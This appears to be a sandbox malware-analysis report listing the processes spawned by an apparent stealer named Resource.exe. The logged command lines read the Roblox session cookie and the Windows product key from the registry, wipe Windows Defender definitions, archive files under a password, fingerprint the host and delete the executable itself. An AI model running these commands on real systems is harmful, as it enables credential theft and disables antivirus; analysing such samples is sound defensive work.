                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                                                            Start time:10:18:19
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                                                                                            Start time:10:18:19
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                                                                                            Start time:10:18:20
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                                                            Start time:10:18:20
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                                                            Start time:10:18:20
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                            Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                                                            Start time:10:18:23
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                            Imagebase:0x7ff7eedd0000
                                                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                                                            Start time:10:18:29
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                                                                                            Start time:10:18:29
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                                                                                            Start time:10:18:29
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
                                                                                                                                                                                                                                                            Imagebase:0x7ff6185c0000
                                                                                                                                                                                                                                                            File size:630'736 bytes
                                                                                                                                                                                                                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                                                                                            Start time:10:18:31
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                                                                                            Start time:10:18:31
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:106
                                                                                                                                                                                                                                                            Start time:10:18:31
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic os get Caption
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:107
                                                                                                                                                                                                                                                            Start time:10:18:32
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                            Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:108
                                                                                                                                                                                                                                                            Start time:10:18:32
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:109
                                                                                                                                                                                                                                                            Start time:10:18:32
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:110
                                                                                                                                                                                                                                                            Start time:10:18:33
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:111
                                                                                                                                                                                                                                                            Start time:10:18:33
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                                                                                            Start time:10:18:33
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                                                                                            Start time:10:18:34
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                                                                                            Start time:10:18:34
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                                                                                            Start time:10:18:34
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                                                                                            Start time:10:18:35
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                                                                                            Start time:10:18:35
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                                                                                            Start time:10:18:35
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                                                                                            Start time:10:18:36
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                                                                                            Start time:10:18:36
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                                                                                            Start time:10:18:36
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                                                                                            Start time:10:18:39
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                                                                                            Start time:10:18:39
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:124
                                                                                                                                                                                                                                                            Start time:10:18:39
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:ping localhost -n 3
                                                                                                                                                                                                                                                            Imagebase:0x7ff795a50000
                                                                                                                                                                                                                                                            File size:22'528 bytes
                                                                                                                                                                                                                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:11.3%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:20.6%
                                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                                              Total number of Limit Nodes:79
